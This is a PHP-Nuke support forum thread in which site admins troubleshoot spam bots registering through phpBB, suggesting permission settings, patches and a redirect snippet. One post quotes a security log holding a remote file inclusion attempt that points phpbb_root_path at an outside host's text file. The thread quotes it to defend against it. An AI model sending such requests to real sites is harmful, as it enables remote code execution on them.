| Author |
Message |
Digital-Overload
Hangin' Around
Joined: May 13, 2005
Posts: 26
|
 Posted:
Thu Sep 21, 2006 9:06 am |
|
Ok, Im Having Tons of Problems with Spam Bots, and i cant fit all the specs in the subject space so,
PHP-Nuke 7.5 Or 7.6, cant be sure which one i uploaded,
phpbb 2.0.10
Nuke Sentinel Secuirity
ok my problem, recently spam bots have been hitting the guestbook, which was disabled, and now they've moved to the Forums,
I've logged in and deleted spam messages for random drugs and sites, deleted the Account, and Banned the IP for spam, but they keep coming about 10 times a day,
Recently I Logged in, went to My PHP-Nuke Admin Section, clicked forums, and clicked on Configuration on the PHPBB Admin Index, and selected "Admin" bullet under "Enable Account Activation"
Problem Is, My Admin Email never recieves any approval notices, and users are still registering,
so, why isnt the registrations requiring Admin Approval?
Does PHP-Nuke Registration Module Not USe the Forums settings?
is there a way i can set nuke to require an admin approval,
it seems registering from the your_account module doesnot require the admin approval that was set in the forums user registration section, and i cant find the option in the PHP-Nuke Configuration panel anywhere,
So is there a setting? or is there a module I can use that will be easy to install and co-exist with the Sentinel Secuirity |
| |
|
|
|
srhh
Involved
Joined: Dec 27, 2005
Posts: 296
|
| Posted:
Thu Sep 21, 2006 9:12 am |
|
HI,
Well, you can avoid the whole admin approval thing if you make your forums view only and disable anonymous posting.
Anyways, the phpbb thing didn't work because that is a different setting and users do not sign up for accounts through phpbb, they go through the Your_Account module.
Which leads me into the next, thing, CNBYA is an advanced Your_Account module and has the ability for admins to approve registration among lots of other things.
But, I think you should be able to at least make new users verify their e-mail address in the standard YourAccount, which iwll stop those spam accounts. |
| |
|
|
|
|
Digital-Overload
|
| Posted:
Thu Sep 21, 2006 9:16 am |
|
right now only registered users can post on my forums, but the spam bots register alot...
When Registering thru Your_Account, the site still requires the user to verify email, oddly enough, my admin email for the site also gets "Failed Delivery" emails for the spambots accounts, yet they are still able to post without verifying the account?
The Forums Configuration Section was recently on "none" for approval, and i did move it to admin, so if they ARE useing the forums module to register, then hopefully i can stop it, but i think they are using the Your_Accounts module... |
| |
|
|
|
|
srhh
|
| Posted:
Thu Sep 21, 2006 10:17 am |
|
Hmm, that's weird. To think of it, I've had the same issue here and there with bots signing up and bypassing the email check, and I'm using CNBYA, but they haven't posted in the forums. I was getting ALOT of spammers trying to post that I saw in my Sentinel logs not to mention viscious bots just draining bandwidth, so I just installed Guardian's SpamStopper yesterday which should hopefully do the trick. Itc checks for bad refferers and keywords like viagra to deny the bot access and/or ban it. Still trying to get it set up, but you can get it here:
http://www.code-authors.com
Otherwise, I'll leave this thread to the experts! |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Thu Sep 21, 2006 6:05 pm |
|
My guess is that the old version of phpBB is being exploited, may need to get your system up to BBToNuke 2.0.21 |
_________________
- Only registered users can see links on this board! Get registered or login! -
Need help? Only registered users can see links on this board! Get registered or login! |
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
| Posted:
Thu Sep 21, 2006 6:05 pm |
|
Make sure you nuke is using the latest patches.
Double check your forum settings in Admin ->Forums ->Permission ->'advanced mode' to make sure post, reply and quote are set to registered only.
If they are only spamming one or two specific forums I suspect this is the reason - some of the forums are set to allow anonymous posting.
Make sure on you main nuke settings that 'allow email changes' is set to NO and allow username changes is also set to NO. |
| |
|
|
|
Digital-Overload
|
| Posted:
Fri Sep 22, 2006 12:03 am |
|
The Forums are all locked to Registered only for Posting,
they seem to be explioting the phpbb Registration Module (forums.html?file=profile&mode=register), Becaue during the last 5 hours 2 more bots registered, but i noticed they didnt post anything, which is unusual, sure enough i check my admin email and both accounts were awaiting approval (even though i deleted from a remote location before checking my admin mail)
Before the Setting for the Forums Enable User Activation was set to either None/User, I recently CHanged it to Admin a few minutes before posting my first post in this topic.
So, They Seem to Be using the Forums themselves to register before posting, and since they are registering using the forums module and not the Your_Account module, the forums settings are forcing them to wait for my approval which they wont get,
Oh,
they are always Spamming my "General Discussion forum" (or Forumid=1), Which is Set to Guest are only allowed to View, and to Post / Reply you have to be Registered,
So it seems for now they are blocked from posting (seeing the forums module requires admin approval to activate their accounts)
Its Odd,
I've ALso been Getting Hits by Random People trying to access the forums admin section with wierd strings, and yes, the Wonderful Sentinel Program Catches them and bans them appropriatly,
Coming From random IPs, What Exaclty are thes e people trying to do?
(removed my domain name to avoid problems)
Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.805
Query String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php?phpbb_root_path=http://mirckurdu.net/images/lol.txt?
Get String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php?phpbb_root_path=http://mirckurdu.net/images/lol.txt?
Post String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php
Forwarded For: 202.157.207.241
Client IP: none
Remote Address: 202.157.192.162
Remote Port: none
Request Method: GET |
Last edited by Digital-Overload on Fri Sep 22, 2006 1:09 am; edited 1 time in total |
|
|
|
|
Guardian2003
|
| Posted:
Fri Sep 22, 2006 12:21 am |
|
This script kiddie has been attacking my site for the last couple of weeks so I'm familiar with this one.
You did not mention forum 'quote' permissions - you may want to re-check those 
And I forgot to mention turning on the security graphic in config.php
You could also set up a redirect in htaccess so that anyone trying to hit the 'register' forum link gets redirected to the YA register page. |
| |
|
|
|
|
Digital-Overload
|
| Posted:
Fri Sep 22, 2006 1:08 am |
|
Well, for now they can attempt to register, but the Forum is requiring them to wait for my approval, so they cant post,
for permissions, everything is set to REG, except teh edit/delete/mod stuff,
the only thing unregistered viewers can do is read..
So For now the Situation is contained, |
| |
|
|
|
|
Guardian2003
|
| Posted:
Fri Sep 22, 2006 7:59 am |
|
|
|
|
|
evaders99
|
| Posted:
Fri Sep 22, 2006 8:08 am |
|
Personally I just disable the forums registration completely
Code:
in includes/usercp_register.php
FIND
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
exit;
}
AFTER, ADD
if ($mode == "register") {
Header("Location: account-new_user.html");
die();
}
|
|
| |
|
|
|
|
thebishop
Worker
Joined: Aug 30, 2005
Posts: 244
Location: Flying to close to the sun
|
| Posted:
Fri Oct 23, 2009 2:48 pm |
|
| evaders99 wrote: | Personally I just disable the forums registration completely
Code:
in includes/usercp_register.php
FIND
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
exit;
}
AFTER, ADD
if ($mode == "register") {
Header("Location: account-new_user.html");
die();
}
|
|
I added that code to the 'usercp_register.php' file but clients are still able to register using the registration link in the forums.
I have had 4 people register over the last week and no new registrant emails were sent for the site admin to approve the registration, and when i check the site i have four new registered clients showing up in the user info block and in the members list.
I am using the latest approve membership module for account approval. with 7.6 np to 3.3. |
| |
|
|
|
|
slackervaara
Worker
Joined: Aug 26, 2007
Posts: 236
|
| Posted:
Sat Oct 24, 2009 2:05 am |
|
|
|
|
|
thebishop
|
| Posted:
Sat Oct 24, 2009 3:27 am |
|
Ok i read all about it and i think this should work.
I would still be interested in how evaders code works though.
Thanks slackervaara. |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
